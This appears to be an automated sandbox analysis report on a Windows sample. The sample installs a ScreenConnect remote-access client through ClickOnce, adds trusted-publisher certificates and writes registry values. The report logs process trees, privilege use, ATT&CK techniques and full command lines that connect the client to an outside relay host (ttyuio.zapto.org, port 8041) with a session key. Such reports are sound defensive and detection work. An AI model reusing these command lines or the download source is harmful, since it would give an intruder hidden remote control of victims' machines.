Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\lock!1a0000003f55580ed8110000bc0600000000000000000000 = 30303030313164382c30316462313436396633373839356335	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb0 = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files\ScreenConnect.ClientService.exe_e781b1ee36 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\SizeOfStronglyNamedComponent = e950090000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\lock!10000000a354580ec8120000741300000000000000000000 = 30303030313263382c30316462313436396630373661346635	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975\lock!020000003f55580ed8110000bc0600000000000000000000 = 30303030313164382c30316462313436396633373839356335	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\lock!11000000a354580ec81200007413000000000000000000004e6d7 = 30303030313263382c30316462313436396630373661346635	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\VisibilityRoots	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\NonCanonicalData	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files\ScreenConnect.WindowsFileManager.exe_0e21f = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\lock!0c0000003f55580ed8110000bc0600000000000000000000 = 30303030313164382c30316462313436396633373839356335	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\Files\ScreenConnect.Client.dll_fc1d7bd48553fcab = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\Transform = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Visibility	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\pin!S_{3f471841-eef2-47d6-89c0-d028f03a4ad5}	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\SizeOfStronglyNamedComponent = e911030000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\DigestValue = 35a6f5eb87179eb7252131a881a8d5d4d9906013	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\SizeOfStronglyNamedComponent = 4a621a0000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\DigestMethod = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Files	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b63 = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files\ScreenConnect.WindowsBackstageShell.exe.co = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106	dfsvc.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\OnlineAppQuotaUsageEstimate = "3707740"	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 30000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\DigestMethod = 01	dfsvc.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	8b5572bd0a7f8a323893cfaffa8dec5b904ef94c24b1e8636659d2eba472ddc0.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	8b5572bd0a7f8a323893cfaffa8dec5b904ef94c24b1e8636659d2eba472ddc0.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	8b5572bd0a7f8a323893cfaffa8dec5b904ef94c24b1e8636659d2eba472ddc0.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	8b5572bd0a7f8a323893cfaffa8dec5b904ef94c24b1e8636659d2eba472ddc0.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3644	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4808	dfsvc.exe
Token: SeDebugPrivilege	3644	ScreenConnect.ClientService.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 4628 wrote to memory of 4808	4628	8b5572bd0a7f8a323893cfaffa8dec5b904ef94c24b1e8636659d2eba472ddc0.exe	91
PID 4628 wrote to memory of 4808	4628	8b5572bd0a7f8a323893cfaffa8dec5b904ef94c24b1e8636659d2eba472ddc0.exe	91
PID 4808 wrote to memory of 4568	4808	dfsvc.exe	92
PID 4808 wrote to memory of 4568	4808	dfsvc.exe	92
PID 4808 wrote to memory of 4568	4808	dfsvc.exe	92
PID 4568 wrote to memory of 5092	4568	ScreenConnect.WindowsClient.exe	94
PID 4568 wrote to memory of 5092	4568	ScreenConnect.WindowsClient.exe	94
PID 4568 wrote to memory of 5092	4568	ScreenConnect.WindowsClient.exe	94
PID 3644 wrote to memory of 4216	3644	ScreenConnect.ClientService.exe	98
PID 3644 wrote to memory of 4216	3644	ScreenConnect.ClientService.exe	98
PID 3644 wrote to memory of 4216	3644	ScreenConnect.ClientService.exe	98
PID 3644 wrote to memory of 1464	3644	ScreenConnect.ClientService.exe	100
PID 3644 wrote to memory of 1464	3644	ScreenConnect.ClientService.exe	100
PID 3644 wrote to memory of 1464	3644	ScreenConnect.ClientService.exe	100

C:\Users\Admin\AppData\Local\Temp\8b5572bd0a7f8a323893cfaffa8dec5b904ef94c24b1e8636659d2eba472ddc0.exe
"C:\Users\Admin\AppData\Local\Temp\8b5572bd0a7f8a323893cfaffa8dec5b904ef94c24b1e8636659d2eba472ddc0.exe"
1⤵
- Manipulates Digital Signatures
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4628
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4808
- - C:\Users\Admin\AppData\Local\Apps\2.0\R57MP0LP.L1O\QXT8BJ3V.ZNE\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
    "C:\Users\Admin\AppData\Local\Apps\2.0\R57MP0LP.L1O\QXT8BJ3V.ZNE\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4568
  - - C:\Users\Admin\AppData\Local\Apps\2.0\R57MP0LP.L1O\QXT8BJ3V.ZNE\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\R57MP0LP.L1O\QXT8BJ3V.ZNE\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e6a895d5-7436-4037-95a5-30f3fd4bcb96&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:5092
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 308
  2⤵
  - Program crash
  PID:3276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4160,i,4356837537417149674,16553092232944545509,262144 --variations-seed-version --mojo-platform-channel-handle=3820 /prefetch:8
1⤵
PID:552

C:\Users\Admin\AppData\Local\Apps\2.0\R57MP0LP.L1O\QXT8BJ3V.ZNE\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
"C:\Users\Admin\AppData\Local\Apps\2.0\R57MP0LP.L1O\QXT8BJ3V.ZNE\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e6a895d5-7436-4037-95a5-30f3fd4bcb96&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3644
- C:\Users\Admin\AppData\Local\Apps\2.0\R57MP0LP.L1O\QXT8BJ3V.ZNE\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\R57MP0LP.L1O\QXT8BJ3V.ZNE\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "6e213c52-b105-4ad8-b87e-36e9f90e76c0" "User"
  2⤵
  - Drops file in System32 directory
  - Executes dropped EXE
  PID:4216
- C:\Users\Admin\AppData\Local\Apps\2.0\R57MP0LP.L1O\QXT8BJ3V.ZNE\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\R57MP0LP.L1O\QXT8BJ3V.ZNE\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "7a452100-273f-4025-8f4a-6dfe40935553" "System"
  2⤵
  - Drops file in System32 directory
  - Executes dropped EXE
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:1464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4628 -ip 4628
1⤵
PID:4620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

